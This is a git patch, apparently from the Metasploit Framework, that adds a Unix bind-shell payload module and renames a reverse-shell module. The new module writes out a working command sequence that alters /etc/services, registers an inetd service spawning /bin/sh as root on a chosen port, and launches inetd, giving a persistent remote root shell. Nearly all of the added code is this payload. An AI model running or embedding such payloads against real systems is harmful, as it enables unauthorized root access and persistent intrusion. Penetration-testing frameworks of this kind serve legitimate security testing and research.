From 75a0aa2e760f8aa44f28d2cb41d77f3924c978e5 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Sun, 15 Jan 2006 21:13:41 +0000
Subject: [PATCH] Bind added, reverse fixed module name

git-svn-id: file:///home/svn/incoming/trunk@3373 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../payloads/singles/cmd/unix/bind_inetd.rb   | 76 +++++++++++++++++++
 .../payloads/singles/cmd/unix/reverse_bash.rb |  2 +-
 2 files changed, 77 insertions(+), 1 deletion(-)
 create mode 100644 modules/payloads/singles/cmd/unix/bind_inetd.rb

diff --git a/modules/payloads/singles/cmd/unix/bind_inetd.rb b/modules/payloads/singles/cmd/unix/bind_inetd.rb
new file mode 100644
index 0000000000..f44ff1a3cc
--- /dev/null
+++ b/modules/payloads/singles/cmd/unix/bind_inetd.rb
@@ -0,0 +1,76 @@
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+
+module Msf
+module Payloads
+module Singles
+module Cmd
+module Unix
+
+module BindInetd
+
+	include Msf::Payload::Single
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Unix Command Shell, Bind TCP (inetd)',
+			'Version'       => '$Revision$',
+			'Description'   => 'Listen for a connection and spawn a command shell (persistent)',
+			'Author'        => 'hdm',
+			'Platform'      => 'unix',
+			'Arch'          => ARCH_CMD,
+			'Handler'       => Msf::Handler::BindTcp,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'cmd',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		return super + command_string
+	end
+	
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+		tmp = "/tmp/.msf_inetd" + $$.to_s
+		cmd =
+			# Create a clean copy of the services file
+			"grep -v msfbind /etc/services>#{tmp};" +
+			
+			# Add our service to it
+			"echo msfbind #{datastore['LPORT']}/tcp>>#{tmp};" +
+			
+			# Overwrite the services file with our new version
+			"cp #{tmp} /etc/services;" +
+			
+			# Create our inetd configuration file with our service
+			"echo msfbind stream tcp nowait root /bin/sh sh>#{tmp};" +
+			
+			# First we try executing inetd without the full path
+			"inetd -s #{tmp} ||" +
+			
+			# Next try the standard inetd path on Linux, Solaris, BSD
+			"/usr/sbin/inetd -s #{tmp} ||" +
+			
+			# Next try the Irix inetd path
+			"/usr/etc/inetd -s #{tmp};"
+
+			# Delete our configuration file
+			"rm #{tmp};";
+
+		return cmd
+	end
+
+end
+
+end end end end end
diff --git a/modules/payloads/singles/cmd/unix/reverse_bash.rb b/modules/payloads/singles/cmd/unix/reverse_bash.rb
index 5fc56b7fdf..72619a1dbb 100644
--- a/modules/payloads/singles/cmd/unix/reverse_bash.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_bash.rb
@@ -8,7 +8,7 @@ module Singles
 module Cmd
 module Unix
 
-module Reverse
+module ReverseBash
 
 	include Msf::Payload::Single